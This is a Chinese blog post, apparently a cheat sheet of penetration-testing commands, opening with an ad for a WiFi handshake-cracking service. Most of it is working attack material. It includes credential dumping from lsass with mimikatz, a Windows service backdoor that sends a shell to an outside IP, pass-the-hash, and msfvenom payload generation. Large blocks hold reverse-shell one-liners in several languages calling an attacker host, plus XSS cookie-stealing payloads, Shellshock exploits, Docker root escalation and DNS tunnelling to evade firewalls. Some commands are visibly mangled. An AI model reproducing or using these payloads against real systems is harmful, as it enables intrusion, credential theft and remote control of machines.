{"id":3165,"date":"2024-03-24T00:35:06","date_gmt":"2024-03-23T16:35:06","guid":{"rendered":"http:\/\/www.ccwifi.cc\/blogs\/?p=3165"},"modified":"2024-03-24T00:35:06","modified_gmt":"2024-03-23T16:35:06","slug":"%e8%b6%85%e5%85%a8%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7%e5%ae%9e%e6%88%98%e4%bd%bf%e7%94%a8%e6%8a%80%e5%b7%a7%e5%90%88%e9%9b%866388","status":"publish","type":"post","link":"https:\/\/www.ccwifi.cc\/blogs\/2024\/03\/24\/%e8%b6%85%e5%85%a8%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7%e5%ae%9e%e6%88%98%e4%bd%bf%e7%94%a8%e6%8a%80%e5%b7%a7%e5%90%88%e9%9b%866388\/","title":{"rendered":"\u8d85\u5168\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\u5b9e\u6218\u4f7f\u7528\u6280\u5de7\u5408\u96c6"},"content":{"rendered":"
\n

\u5728\u7ebfwifi\u8dd1\u5305 \u91d1\u521a\u5305\u8dd1\u5305 cap\u8dd1\u5305 hccapx ewsa\u5728\u7ebf \u5c31\u6765 \u63e1\u624b\u5305\u8dd1\u5305<\/a><\/strong><\/p>\n

\u5404\u4f4d\u597d \u53c8\u89c1\u9762\u4e86 \u6211\u662f\u66f9\u64cd \u4eca\u5929\u7ed9\u5927\u5bb6\u5e26\u6765\u4e00\u7bc7\u65b0\u7684\u6559\u7a0b<\/p>\n

\u5e0c\u671b\u5404\u4f4d\u7ec6\u5fc3\u5b66\u4e60 \u4f4e\u8c03\u7528\u7f51<\/p>\n<\/div>\n

wget http:\/\/www.net-square.com\/_assets\/httprint_linux_301.zip && unzip httprint_linux_301.zip    \/\/\u4e0b\u8f7d\u5e76\u89e3\u538b\u538b\u7f29\u6587\u4ef6\u5305\ncd httprint_301\/linux\/          \/\/\u5207\u6362\u5230\u6307\u5b9a\u76ee\u5f55\n.\/httprint -h http:\/\/IP -s signatures.txt     \/\/ -h\u6307\u5b9a\u7f51\u7ad9\u94fe\u63a5 -s \u6307\u5b9a\u4e00\u4e2a\u5305\u542bhttp\u7b7e\u540d\u7684\u6587\u4ef6\uff0c\u9ed8\u8ba4\u5c31\u662fsignatures.txt<\/code><\/pre>\n
skipfish -m 5 -LY -S \/usr\/share\/skipfish\/dictionaries\/complete.wl -o .\/skipfish2 -u http:\/\/IP<\/code><\/pre>\n
nc -v -w 1 target -z 1-1000\nfor i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done<\/code><\/pre>\n
c:> nc -l -p 31337     \n#nc 192.168.0.10 31337\nc:> nc -v -w 30 -p 31337 -l  secret.txt<\/code><\/pre>\n
nc 192.168.0.10 80\nGET \/ HTTP\/1.1\nHost: 192.168.0.10\nUser-Agent: Mozilla\/4.0\nReferrer: www.example.com\n\n<\/code><\/pre>\n
c:>nc -Lp 31337 -vv -e cmd.exe\nnc 192.168.0.10 31337\nc:>nc example.com 80 -e cmd.exe\nnc -lp 80\n \nnc -lp 31337 -e \/bin\/bash\nnc 192.168.0.10 31337\nnc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i\/o error) 1-1000<\/code><\/pre>\n
us -H -msf -Iv 192.168.56.101 -p 1-65535\nus -H -mU -Iv 192.168.56.101 -p 1-65535\n-H \u5728\u751f\u6210\u62a5\u544a\u9636\u6bb5\u89e3\u6790\u4e3b\u673a\u540d\n-m \u626b\u63cf\u7c7b\u578b (sf - tcp, U - udp)\n-Iv - \u8be6\u7ec6<\/code><\/pre>\n
xprobe2 -v -p tcp:80:open IP<\/code><\/pre>\n
nmblookup -A target     \nsmbclient \/\/MOUNT\/share -I target -N\nrpcclient -U \"\" target\nenum4linux target<\/code><\/pre>\n
snmpget -v 1 -c public IP\nsnmpwalk -v 1 -c public IP\nsnmpbulkwalk -v2c -c public -Cn0 -Cr10 IP<\/code><\/pre>\n
net localgroup Users\nnet localgroup Administrators\nsearch dir\/s *.doc\nsystem(\"start cmd.exe \/k $cmd\")\nsc create microsoft_update binpath=\"cmd \/K start c:nc.exe -d ip-of-hacker port -e cmd.exe\" start= auto error= ignore\n\/c C:nc.exe -e c:windowssystem32cmd.exe -vv 23.92.17.103 7779\nmimikatz.exe \"privilege::debug\" \"log\" \"sekurlsa::logonpasswords\"\nProcdump.exe -accepteula -ma lsass.exe lsass.dmp\nmimikatz.exe \"sekurlsa::minidump lsass.dmp\" \"log\" \"sekurlsa::logonpasswords\"\nC:tempprocdump.exe -accepteula -ma lsass.exe lsass.dmp 32\u4f4d\u7cfb\u7edf\nC:tempprocdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64\u4f4d\u7cfb\u7edf<\/code><\/pre>\n
\/\/ \u8f6c\u53d1\u8fdc\u7a0b\u7aef\u53e3\u5230\u76ee\u6807\u5730\u5740\nplink.exe -P 22 -l root -pw \"1234\" -R 445:127.0.0.1:445 IP\n<\/code><\/pre>\n
\/\/ https:\/\/www.offensive-security.com\/metasploit-unleashed\/portfwd\/\n\/\/ \u8f6c\u53d1\u8fdc\u7a0b\u7aef\u53e3\u5230\u76ee\u6807\u5730\u5740\nmeterpreter > portfwd add \u2013l 3389 \u2013p 3389 \u2013r 172.16.194.141\nkali > rdesktop 127.0.0.1:3389\n<\/code><\/pre>\n
reg add \"hklmsystemcurrentcontrolsetcontrolterminal server\" \/f \/v fDenyTSConnections \/t REG_DWORD \/d 0\nnetsh firewall set service remoteadmin enable\nnetsh firewall set service remotedesktop enable\n<\/code><\/pre>\n
\/\/ \u53c2\u8003\u6587\u7ae0\uff1ahttps:\/\/www.offensive-security.com\/metasploit-unleashed\/enabling-remote-desktop\/\nrun getgui -u admin -p 1234\nrun vnc -p 5043\n<\/code><\/pre>\n
git clone https:\/\/github.com\/gentilkiwi\/mimikatz.git\nprivilege::debug\nsekurlsa::logonPasswords full<\/code><\/pre>\n
\/\/\u8bbf\u95eegit\u9879\u76ee\ngit clone https:\/\/github.com\/byt3bl33d3r\/pth-toolkit         \npth-winexe -U hash \/\/IP cmd\n\u6216\u8005\napt-get install freerdp-x11\nxfreerdp \/u:offsec \/d:win2012 \/pth:HASH \/v:IP\n\u6216\u8005\nmeterpreter > run post\/windows\/gather\/hashdump\nAdministrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\nmsf > use exploit\/windows\/smb\/psexec\nmsf exploit(psexec) > set payload windows\/meterpreter\/reverse_tcp\nmsf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c\nmsf exploit(psexec) > exploit\nmeterpreter > s\n<\/code><\/pre>\n
hashcat -m 400 -a 0 hash \/root\/rockyou.txt\n<\/code><\/pre>\n
python -c 'import pty;pty.spawn(\"\/bin\/bash\")'\n<\/code><\/pre>\n
python2 -m SimpleHTTPServer\npython3 -m http.server\nruby -rwebrick -e \"WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start\"\nphp -S 0.0.0.0:8888\n<\/code><\/pre>\n
fuser -nv tcp 80\nfuser -k -n tcp 80\n<\/code><\/pre>\n
hydra -l admin -P \/root\/Desktop\/passwords -S X.X.X.X rdp\n<\/code><\/pre>\n
smbmount \/\/X.X.X.X\/c$ \/mnt\/remote\/ -o username=user,password=pass,rw\n<\/code><\/pre>\n
gcc -m32 -o output32 hello.c (32 \u4f4d)\ngcc -m64 -o output hello.c (64 \u4f4d)<\/code><\/pre>\n
wget -O mingw-get-setup.exe http:\/\/sourceforge.net\/projects\/mingw\/files\/Installer\/mingw-get-setup.exe\/download\nwine mingw-get-setup.exe\nselect mingw32-base\ncd \/root\/.wine\/drive_c\/windows\nwget http:\/\/gojhonny.com\/misc\/mingw_bin.zip && unzip mingw_bin.zip\ncd \/root\/.wine\/drive_c\/MinGW\/bin\nwine gcc -o ability.exe \/tmp\/exploit.c -lwsock32\nwine ability.exe\n<\/code><\/pre>\n
nasm -f bin -o payload.bin payload.asm\nnasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload\n<\/code><\/pre>\n
ssh -D 127.0.0.1:1080 -p 22 user@IP\nAdd socks4 127.0.0.1 1080 in \/etc\/proxychains.conf\nproxychains commands target\n<\/code><\/pre>\n
ssh -D 127.0.0.1:1080 -p 22 user1@IP1\nAdd socks4 127.0.0.1 1080 in \/etc\/proxychains.conf\nproxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2\nAdd socks4 127.0.0.1 1081 in \/etc\/proxychains.conf\nproxychains commands target\n<\/code><\/pre>\n
route add X.X.X.X 255.255.255.0 1\nuse auxiliary\/server\/socks4a\nrun\nproxychains msfcli windows\/* PAYLOAD=windows\/meterpreter\/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E\n\u6216\u8005\nhttps:\/\/www.offensive-security.com\/metasploit-unleashed\/pivoting\/\nmeterpreter > ipconfig\nIP Address  : 10.1.13.3\nmeterpreter > run autoroute -s 10.1.13.0\/24\nmeterpreter > run autoroute -p\n10.1.13.0          255.255.255.0      Session 1\nmeterpreter > Ctrl+Z\nmsf auxiliary(tcp) > use exploit\/windows\/smb\/psexec\nmsf exploit(psexec) > set RHOST 10.1.13.2\nmsf exploit(psexec) > exploit\nmeterpreter > ipconfig\nIP Address  : 10.1.13.\n<\/code><\/pre>\n
git clone https:\/\/github.com\/offensive-security\/exploit-database.git\ncd exploit-database\n.\/searchsploit \u2013u\n.\/searchsploit apache 2.2\n.\/searchsploit \"Linux Kernel\"\ncat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep \"<|<=\" | sort -k3\n<\/code><\/pre>\n
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST= X > system.exe\nmsfvenom -p php\/meterpreter\/reverse_tcp LHOST= LPORT=443 R > exploit.php\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST= LPORT=443 -e x86\/shikata_ga_nai -b \"x00\" -a x86 --platform win -f c\n<\/code><\/pre>\n
msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell<\/code><\/pre>\n
msfvenom -p windows\/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b \"x00x0ax0d\" -a x86 --platform win -f c\n<\/code><\/pre>\n
msfvenom -p cmd\/unix\/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py\n<\/code><\/pre>\n
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp\n<\/code><\/pre>\n
msfvenom -p cmd\/unix\/reverse_bash LHOST= LPORT= -o shell.sh\n<\/code><\/pre>\n
msfvenom -p php\/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php\nadd <?php at the beginning\nperl -i~ -0777pe's\/^\/<?php n\/' shell.php\n<\/code><\/pre>\n
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o shell.exe\n<\/code><\/pre>\n
\/\/ \u4f7f\u7528 uid \u67e5\u627e\u5bf9\u5e94\u7684\u7a0b\u5e8f\nfind \/ -uid 0 -perm -4000\n\/\/ \u67e5\u627e\u54ea\u91cc\u62e5\u6709\u5199\u6743\u9650\nfind \/ -perm -o=w\n\/\/ \u67e5\u627e\u540d\u79f0\u4e2d\u5305\u542b\u70b9\u548c\u7a7a\u683c\u7684\u6587\u4ef6\nfind \/ -name \" \" -print\nfind \/ -name \"..\" -print\nfind \/ -name \". \" -print\nfind \/ -name \" \" -print\n\/\/ \u67e5\u627e\u4e0d\u5c5e\u4e8e\u4efb\u4f55\u4eba\u7684\u6587\u4ef6\nfind \/ -nouser\n\/\/ \u67e5\u627e\u672a\u94fe\u63a5\u7684\u6587\u4ef6\nlsof +L1\n\/\/ \u83b7\u53d6\u8fdb\u7a0b\u6253\u5f00\u7aef\u53e3\u7684\u4fe1\u606f\nlsof -i\n\/\/ \u770b\u770b ARP \u8868\u4e2d\u662f\u5426\u6709\u5947\u602a\u7684\u4e1c\u897f\narp -a\n\/\/ \u67e5\u770b\u6240\u6709\u8d26\u6237\ngetent passwd\n\/\/ \u67e5\u770b\u6240\u6709\u7528\u6237\u7ec4\ngetent group\n\/\/ \u5217\u4e3e\u6240\u6709\u7528\u6237\u7684 crontabs\nfor user in $(getent passwd|cut -f1 -d:); do echo \"### Crontabs for $user ####\"; crontab -u $user -l; done\n\/\/ \u751f\u6210\u968f\u673a\u5bc6\u7801\ncat \/dev\/urandom| tr -dc \u2018a-zA-Z0-9-_!@#$%^&*()_+{}|:?=\u2019|fold -w 12| head -n 4\n\/\/ \u67e5\u627e\u6240\u6709\u4e0d\u53ef\u4fee\u6539\u7684\u6587\u4ef6\nfind . | xargs -I file lsattr -a file 2>\/dev\/null | grep \u2018^\u2026.i\u2019\n\/\/ \u4f7f\u6587\u4ef6\u4e0d\u53ef\u4fee\u6539\nchattr -i file\n<\/code><\/pre>\n
msfvenom -p windows\/shell_bind_tcp -a x86 --platform win -b \"x00\" -f c\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86\/shikata_ga_nai -b \"x00\" -f c\nCOMMONLY USED BAD CHARACTERS:\nx00x0ax0dx20                              For http request\nx00x0ax0dx20x1ax2cx2e3ax5c           Ending with (0nr_)\n\/\/ \u5e38\u7528\u547d\u4ee4:\npattern create\npattern offset (EIP Address)\npattern offset (ESP Address)\nadd garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )\n!pvefindaddr pattern_create 5000\n!pvefindaddr suggest\n!pvefindaddr modules\n!pvefindaddr nosafeseh\n!mona config -set workingfolder C:Mona%p\n!mona config -get workingfolder\n!mona mod\n!mona bytearray -b \"x00x0a\"\n!mona pc 5000\n!mona po EIP\n!mona sugg\n<\/code><\/pre>\n
\/\/  \u53c2\u8003\u6587\u7ae0\uff1ahttps:\/\/en.wikipedia.org\/wiki\/Microsoft-specific_exception_handling_mechanisms#SEH\n!mona suggest\n!mona nosafeseh\nnseh=\"xebx06x90x90\" (next seh chain)\niseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)\n<\/code><\/pre>\n
\/\/ \u53c2\u8003\u6587\u7ae0\uff1ahttps:\/\/en.wikipedia.org\/wiki\/Return-oriented_programming\n\/\/ \u53c2\u8003\u6587\u7ae0\uff1ahttps:\/\/zh.wikipedia.org\/wiki\/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B\n\/\/ \u53c2\u8003\u6587\u7ae0\uff1ahttps:\/\/en.wikipedia.org\/wiki\/Data_Execution_Prevention\n!mona modules\n!mona ropfunc -m *.dll -cpb \"x00x09x0a\"\n!mona rop -m *.dll -cpb \"x00x09x0a\" (auto suggest\n<\/code><\/pre>\n
\/\/ \u53c2\u8003\u6587\u7ae0\uff1ahttps:\/\/en.wikipedia.org\/wiki\/Address_space_layout_randomization\n!mona noasl\n<\/code><\/pre>\n
\/\/ https:\/\/www.corelan.be\/index.php\/2010\/01\/09\/exploit-writing-tutorial-part-8-win32-egg-hunting\/\n!mona jmp -r esp\n!mona egg -t lxxl\nxebxc4 (jump backward -60)\nbuff=lxxllxxl+shell\n!mona egg -t 'w00t'\n<\/code><\/pre>\n
\/\/ \u8bbe\u7f6e\u65ad\u70b9\nbreak *_start\n\/\/ \u6267\u884c\u4e0b\u4e00\u4e2a\u547d\u4ee4\nnext\nstep\nn\ns\n\/\/ \u7ee7\u7eed\u6267\u884c\ncontinue\nc\n\/\/ \u6570\u636e\nchecking 'REGISTERS' and 'MEMORY'\n\/\/ \u663e\u793a\u5bc4\u5b58\u5668\u7684\u503c: (Decimal,Binary,Hex)\nprint \/d \u2013> Decimal\nprint \/t \u2013> Binary\nprint \/x \u2013> Hex\nO\/P :\n(gdb) print \/d $eax\n$17 = 13\n(gdb) print \/t $eax\n$18 = 1101\n(gdb) print \/x $eax\n$19 = 0xd\n(gdb)\n\/\/ \u663e\u793a\u7279\u5b9a\u5185\u5b58\u5730\u5740\u7684\u503c\ncommand : x\/nyz (Examine)\nn \u2013> Number of fields to display ==>\ny \u2013> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)\nz \u2013> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 \n<\/code><\/pre>\n
bash -i >& \/dev\/tcp\/X.X.X.X\/443 0>&1\nexec \/bin\/bash 0&0 2>&0\nexec \/bin\/bash 0&0 2>&0\n0<&196;exec 196\/dev\/tcp\/attackerip\/4444; sh &196 2>&196\n0<&196;exec 196\/dev\/tcp\/attackerip\/4444; sh &196 2>&196\nexec 5\/dev\/tcp\/attackerip\/4444 cat &5 >&5; done # or: while read line 0&5 >&5; done\nexec 5\/dev\/tcp\/attackerip\/4444\ncat &5 >&5; done # or:\nwhile read line 0&5 >&5; done\n\/bin\/bash -i > \/dev\/tcp\/attackerip\/8080 0&1\n\/bin\/bash -i > \/dev\/tcp\/X.X.X.X\/443 0<&1\n<\/code><\/pre>\n
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"attackerip:443\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while;'\n\/\/ Win \u5e73\u53f0\nperl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"attackerip:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while;'\nperl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"\/bin\/sh -i\");};\u2019\n<\/code><\/pre>\n
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attackerip\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n\/\/ Win \u5e73\u53f0\nruby -rsocket -e 'c=TCPSocket.new(\"attackerip\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\nruby -rsocket -e 'f=TCPSocket.open(\"attackerip\",\"443\").to_i;exec sprintf(\"\/bin\/sh -i &%d 2>&%d\",f,f,f)'\n<\/code><\/pre>\n
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attackerip\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'\n<\/code><\/pre>\n
php -r '$sock=fsockopen(\"attackerip\",443);exec(\"\/bin\/sh -i &3 2>&3\");'\n<\/code><\/pre>\n
r = Runtime.getRuntime()\np = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5\/dev\/tcp\/attackerip\/443;cat &5 >&5; done\"] as String[])\np.waitFor()\n<\/code><\/pre>\n
nc -e \/bin\/sh attackerip 4444\nnc -e \/bin\/sh 192.168.37.10 443\n\/\/ \u5982\u679c -e \u53c2\u6570\u88ab\u7981\u7528\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u4ee5\u4e0b\u547d\u4ee4\n\/\/ mknod backpipe p && nc attackerip 443 0backpipe\n\/bin\/sh | nc attackerip 443\nrm -f \/tmp\/p; mknod \/tmp\/p p && nc attackerip 4443 0\/tmp\/\n\/\/ \u5982\u679c\u4f60\u5b89\u88c5\u9519\u4e86 netcat \u7684\u7248\u672c\uff0c\u8bf7\u5c1d\u8bd5\u4ee5\u4e0b\u547d\u4ee4\nrm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc attackerip >\/tmp\/\n<\/code><\/pre>\n
\/\/ \u5982\u679c netcat \u4e0d\u53ef\u7528\u6216\u8005 \/dev\/tcp\nmknod backpipe p && telnet attackerip 443 0backpipe\n<\/code><\/pre>\n
\/\/ http:\/\/baike.baidu.com\/view\/418628.htm\n\/\/ \u5f00\u542f X \u670d\u52a1\u5668 (:1 \u2013 \u76d1\u542c TCP \u7aef\u53e3 6001)\napt-get install xnest\nXnest :1\n\/\/ \u8bb0\u5f97\u6388\u6743\u6765\u81ea\u76ee\u6807 IP \u7684\u8fde\u63a5\nxterm -display 127.0.0.1:1\n\/\/ \u6388\u6743\u8bbf\u95ee\nxhost +targetip\n\/\/ \u5728\u76ee\u6807\u673a\u5668\u4e0a\u8fde\u63a5\u56de\u6211\u4eec\u7684 X \u670d\u52a1\u5668\nxterm -display attackerip:1\n\/usr\/openwin\/bin\/xterm -display attackerip:1\nor\n$ DISPLAY=attackerip:0 xte\n<\/code><\/pre>\n
https:\/\/www.owasp.org\/index.php\/XSS_Filter_Evasion_Cheat_Sheet\n(\" src=http:\/\/IP:PORT \")\ndocument.location=http:\/\/IP:PORT\n';alert(String.fromCharCode(88,83,83))\/\/';alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/\u2013>\">'>alert(String.fromCharCode(88,83,83))\n\";!\u2013\"=&amp;{()}\n\"hashcat\u7834\u89e3\u6559\u7a0b\"\nalert(\"XSS\")\"\">\n\"hashcat\u7834\u89e3\u6559\u7a0b\"\nperl -e 'print \"\";' > out\n\n(\">< iframes http:\/\/google.com )\n\n\n\">alert(document.cookie)\n%253cscript%253ealert(document.cookie)%253c\/script%253e\n\">alert(document.cookie)\n%22\/%3E%3CBODY%20onload=\u2019document.write(%22%3Cs%22%2b%22cript%20src=http:\/\/my.box.com\/xss.js%3E%3C\/script%3E%22)'%3E\n<\/s><\/code><\/pre>\n
<\/p>\n
59.SSH Over SCTP (\u4f7f\u7528 Socat)<\/p>\n
socat\u662f\u4e00\u4e2a\u591a\u529f\u80fd\u7684\u7f51\u7edc\u5de5\u5177\uff0c\u540d\u5b57\u6765\u7531\u662f\u201d Socket CAT\u201d\uff0c\u53ef\u4ee5\u770b\u4f5c\u662fnetcat\u7684N<\/p>\n
\u500d\u52a0\u5f3a\u7248\u3002<\/p>\n
\u5b98\u65b9\u7f51\u7ad9\uff1a<\/p>\n
\u5b89\u88c5\u53ca\u4f7f\u7528\u6559\u7a0b\uff1a<\/p>\n
\u547d\u4ee4\u5b66\u4e60\uff1a<\/p>\n<\/p>\n
\/\/ \u8fdc\u7aef\u670d\u52a1\u5668\n\/\/ \u5047\u8bbe\u4f60\u51c6\u5907\u8ba9 SCTP socket \u76d1\u542c\u7aef\u53e3 80\/SCTP \u5e76\u4e14 sshd \u7aef\u53e3\u5728 22\/TCP\n$ socat SCTP-LISTEN:80,fork TCP:localhost:22\n\/\/ \u672c\u5730\u7aef\n\/\/ \u5c06 SERVER_IP \u6362\u6210\u8fdc\u7aef\u670d\u52a1\u5668\u7684\u5730\u5740\uff0c\u7136\u540e\u5c06 80 \u6362\u6210 SCTP \u76d1\u542c\u7684\u7aef\u53e3\u53f7\n$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80\n\/\/ \u521b\u5efa socks \u4ee3\u7406\n\/\/ \u66ff\u6362 username \u548c -p \u7684\u7aef\u53e3\u53f7\n$ ssh -lusername localhost -D 8080 -p 1337\n\u4f7f\u7528\u6d0b\u8471\u7f51\u7edc\n\/\/ \u5b89\u88c5\u670d\u52a1\n$ apt-get install tor torsocks\n\/\/ \u7ed1\u5b9a ssh \u5230 tor \u670d\u52a1\u7aef\u53e3 80\n\/\/  \/etc\/tor\/torrc\nSocksPolicy accept 127.0.0.1\nSocksPolicy accept 192.168.0.0\/16\nLog notice file \/var\/log\/tor\/notices.log\nRunAsDaemon 1\nHiddenServiceDir \/var\/lib\/tor\/ssh_hidden_service\/\nHiddenServicePort 80 127.0.0.1:22\nPublishServerDescriptor 0\n$ \/etc\/init.d\/tor start\n$ cat \/var\/lib\/tor\/ssh_hidden_service\/hostname\n3l5zstvt1zk5jhl662.onion\n\/\/ ssh \u5ba2\u6237\u7aef\u8fde\u63a5\n$ apt-get install torsocks\n$ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p\n<\/code><\/pre>\n<\/p>\n
60.Metagoofil \u2013 \u5143\u6570\u636e\u6536\u96c6\u5de5\u5177<\/p>\n
Metagoofil \u662f\u4e00\u6b3e\u5229\u7528Google\u6536\u96c6\u4fe1\u606f\u7684\u5de5\u5177\u3002\u5b83\u53ef\u4ee5\u81ea\u52a8\u5728\u641c\u7d20\u5f15\u64ce\u4e2d\u68c0\u7d22\u548c\u5206\u6790\u6587\u4ef6\uff0c\u8fd8\u5177\u6709\u63d0\u4f9bMac\u5730\u5740\uff0c\u7528\u6237\u540d\u5217\u8868\u7b49\u5176\u4ed6\u529f\u80fd<\/p>\n
\u5b98\u7f51\u5730\u5740<\/p>\n
\u62d3\u5c55\u5b66\u4e60\u300ametagoofil\u7528\u6cd5\u300b\uff1a<\/p>\n<\/p>\n
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html\n<\/code><\/pre>\n<\/p>\n
61.\u5229\u7528 Shellshock<\/p>\n
\u4e00\u4e2a\u53d1\u73b0\u5e76\u5229\u7528\u670d\u52a1\u5668 Shellshock \u7684\u5de5\u5177<\/p>\n
\u5b89\u88c5\u53ca\u4f7f\u7528\uff1a<\/p>\n<\/p>\n
$ .\/shocker.py -H 192.168.56.118  --command \"\/bin\/cat \/etc\/passwd\" -c \/cgi-bin\/status --verbose\n\/\/ \u67e5\u770b\u6587\u4ef6\n$ echo -e \"HEAD \/cgi-bin\/status HTTP\/1.1rnUser-Agent: () { :;}; echo $(<\/etc\/passwd)rnHost: vulnerablernConnection: closernrn\" | nc 192.168.56.118 80\n\/\/ \u7ed1\u5b9a shell\n$ echo -e \"HEAD \/cgi-bin\/status HTTP\/1.1rnUser-Agent: () { :;}; \/usr\/bin\/nc -l -p 9999 -e \/bin\/shrnHost: vulnerablernConnection: closernrn\" | nc 192.168.56.118 80\n\/\/ \u53cd\u5f39 Shell\n$ nc -l -p 443\n$ echo \"HEAD \/cgi-bin\/status HTTP\/1.1rnUser-Agent: () { :;}; \/usr\/bin\/nc 192.168.56.103 443 -e \/bin\/shrnHost: vulnerablernConnection: closernrn\" | nc 192.168.56.118 \n<\/code><\/pre>\n<\/p>\n
62.\u83b7\u53d6 Docker \u7684 Root<\/p>\n<\/p>\n
\/\/ \u83b7\u53d6  Docker \u7684 Root\n\/\/ user \u5fc5\u987b\u5728 docker \u7528\u6237\u7ec4\u4e2d\nek@victum:~\/docker-test$ id\nuid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)\nek@victum:~$ mkdir docker-test\nek@victum:~$ cd docker-test\nek@victum:~$ cat > Dockerfile\nFROM debian:wheezy\nENV WORKDIR \/stuff\nRUN mkdir -p $WORKDIR\nVOLUME [ $WORKDIR ]\nWORKDIR $WORKDIR\n<< EOF\nek@victum:~$ docker build -t my-docker-image .\nek@victum:~$ docker run -v $PWD:\/stuff -t my-docker-image \/bin\/sh -c \n'cp \/bin\/sh \/stuff && chown root.root \/stuff\/sh && chmod a+s \/stuff\/sh'\n.\/sh\nwhoami\n# root\nek@victum:~$ docker run -v \/etc:\/stuff -t my-docker-image \/bin\/sh -c 'cat \/stuff\/\n<\/code><\/pre>\n<\/p>\n
63.\u4f7f\u7528 DNS \u96a7\u9053\u7ed5\u8fc7\u9632\u706b\u5899<\/p>\n<\/p>\n
\/\/ \u8ba9\u6570\u636e\u548c\u547d\u4ee4\u4f7f\u7528 DNS \u96a7\u9053\u4f20\u8f93\u4ee5\u7ed5\u8fc7\u9632\u706b\u5899\u7684\u68c0\u67e5\n\/\/ dnscat2 \u652f\u6301\u4ece\u76ee\u6807\u4e3b\u673a\u4e0a\u9762\u4e0a\u4f20\u548c\u4e0b\u8f7d\u547d\u4ee4\u6765\u83b7\u53d6\u6587\u4ef6\u3001\u6570\u636e\u548c\u7a0b\u5e8f\n\/\/ \u670d\u52a1\u5668 (\u653b\u51fb\u8005)\n$ apt-get update\n$ apt-get -y install ruby-dev git make g++\n$ gem install bundler\n$ git clone https:\/\/github.com\/iagox86\/dnscat2.git\n$ cd dnscat2\/server\n$ bundle install\n$ ruby .\/dnscat2.rb\ndnscat2> New session established: 16059\ndnscat2> session -i 16059\n\/\/ \u5ba2\u6237\u673a (\u76ee\u6807)\n\/\/ https:\/\/downloads.skullsecurity.org\/dnscat2\/\n\/\/ https:\/\/github.com\/lukebaggett\/dnscat2-powershell\n$ dnscat --host <dnscat server_ip\n<\/code><\/pre>\n<\/p>\n
64.\u7f16\u8bd1 Assemble \u4ee3\u7801<\/p>\n<\/p>\n
$ nasm -f elf32 simple32.asm -o simple32.o\n$ ld -m elf_i386 simple32.o simple32\n$ nasm -f elf64 simple.asm -o simple.o\n$ ld simple.o -o simple\n<\/code><\/pre>\n<\/p>\n
65.\u4f7f\u7528\u975e\u4ea4\u4e92 Shell \u6253\u5165\u5185\u7f51<\/p>\n<\/p>\n
